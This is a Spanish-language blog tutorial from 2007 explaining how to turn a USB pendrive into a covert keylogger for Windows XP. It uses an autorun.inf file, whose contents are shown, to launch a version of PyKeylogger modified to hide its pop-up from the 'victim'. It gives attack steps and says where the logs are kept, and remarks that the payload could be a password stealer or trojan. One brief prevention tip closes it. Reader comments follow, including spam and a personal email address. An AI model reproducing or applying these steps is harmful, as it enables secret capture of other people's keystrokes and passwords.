| Mobile| RSS

Tutorial: USB KeyLogger

sábado, 29 de septiembre de 2007 | Tags: | 9 Comentarios

Hoy nos olvidamos de cables, backdoors, ARP Poisoning, ettercap, sniffers y todo aquello que tenga que ver con redes.

Mucha gente cree que con proteger su equipo contra ataques atraves de la red con firewalls y antiviruses, el ordenador ya es seguro e impenetrable. Sin embargo, ¿que pasa cuando el atacante tiene acceso físico a la maquina? ¿Es realmente peligroso?

Para demostrar el potencial de este tipo de ataques, hoy vamos a crear nuestro propio USB-Keylogger. Un “pendrive” que al conectarlo a nuestro querido Windows, guardara todo aquello que tecleemos sin que, por supuesto el usuario “victima” se entere.

Bueno…, miento, en realidad este metodo tiene truco, ya que para hacerlo funcionar windows tiene que tener habilitada el mecanismo de autoarranque. Es decir, cuando insertemos el pendrive, windows debera ejecutar el archivo autorun.inf. Sin embargo, por lo general no es problema ya que windows tiene dicha opcion activada por defecto.

Requisitos:

  1. Maquina con Windows (probado en XP SP2)
  2. Un Pendrive (de con al menos 15 MB)

Instalación:

  1. Descárgate este archivo y descomprímelo en el directorio raíz del Pendrive.

Ataque:

  1. Conectar el USB a la maquina.
  2. Seleccionar la primera opción en el menú de Auto arranque “Iniciar Keylogger”.
  3. Una vez arrancado el Keylogger pulsa F12 para acceder al los menus (opcional).

Al pulsar “Aceptar” veras que hay un nuevo proceso llamado keylogger.exe, este es el encargado de registrar todas las teclas pulsaciones realizadas sobre el teclado.

Acceso a los Logs:

  1. Los logs se irán almacenando en la carpeta “logdir”.
  2. Usa tu editor de texto favorito para acceder a ellos.

Como Funciona:

Cuando conectamos un medio extraíble a nuestro sistema (CDs, DVDs, Pendrives, etc), Windows nos permite incluir un archivo “Autorun.inf” en el que podemos definir el comportamiento del medio, ex;dar nombre a la unidad, asignarle iconos especiales o lanzar aplicaciones. Asi es como Juegos, CDs de Música e Instaladores nos sorprenden con sus encantadores menús cada vez que los insertamos en el ordenador.

Desde Autorun.inf podemos ejecutar cualquier aplicación, lo único que debemos de conocer es su ubicación, en este ejemplo un keylogger, pero perfectamente podría ser reemplazado por un ladrón de passwords, virus, troyanos, o lo que se nos ocurra.

En este ejemplo solo usaremos los comandos mas basico:

label: Asigna el nombre de la unidad.
icon: ubicacion del icono que se asignara a la unidad.
action: Texto que se mostrara como opcion por defecto en el menu de autoarranque.
shellexecute: Aplicacion que ejecutar.

Autorun.inf

[Autorun]
label=Icaix.com
icon=”icaix.ico”
action=Iniciar Keylogger
shellexecute= “Keylogger.exe”

Keylogger

El keylogger usado se llama PyKeylogger. Esta es la pagina oficial. Os recomiendo que le echéis un ojo, es open source con licencia GPL.
El binario del ejemplo no es exactamente el de la página oficial. Para eliminar el pop up inicial y hacer el ataque más real he modificado la línea 114 del archivo “keylogger.pyw”. Aquí una copia.

Prevención:

La forma de evitar este tipo de ataques es deshabilitar la opcion de autoarranque de windows. Aquí os dejo un link de cómo hacerlo.

9 Respondiendo
gravatar
Anónimo
on 30 de diciembre de 2008, 22:49  

solamente me queda agredecer brother ... salud "

gravatar
Anónimo
on 17 de mayo de 2010, 17:55  

Gracias, men de verdad gracias

gravatar
Mobile Phone
on 1 de agosto de 2011, 3:29  

I must admit that this is one great insight. It surely gives a company the opportunity to get in on the ground floor and really take part in creating something special and tailored to their needs. mid autumn festival 2011 holiday forum Singapore travel chinese new year 2012 Thailand travel new year 2012

gravatar
Krone
on 16 de abril de 2012, 23:22  

link caido! :(

gravatar
Krone
on 16 de abril de 2012, 23:22  

link caido! :(

gravatar
Anónimo
on 23 de abril de 2012, 10:01  

Hola,podria arrelgar el enlace please =)

gravatar
Unknown
on 4 de octubre de 2012, 20:39  

wena wena exelente pero lo que sucede es que no entiendo si yo quiero hacer que se autoejecute el programa como lo hago ya que no veo ningun archivo que termine en .com o que diga Keylogger.exe

gravatar
Unknown
on 15 de octubre de 2013, 22:55  

Hola soy derec

me gusto mucho lo del keylogger via usb del 2007 pero cuando ingreso a la pagina no me sale nada

nose si tu me podrias hacer un favor y mandarme otro linck?

a esta cuanta de hotmail te lo agradeseria

derec_brick@hotmail.com

gravatar
Unknown
on 15 de octubre de 2013, 22:56  

Hola soy danny me gusto tu post de keylogger via usb quisiera que me mandaras un linck nuevo porque el otro linck que esta ahi en tu pagina no me aparese nada te lo agradeseria mucho si me lo mandaras a esta direccion de correo:derec_brick@hotmail.com
gracias

Publicar un comentario

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter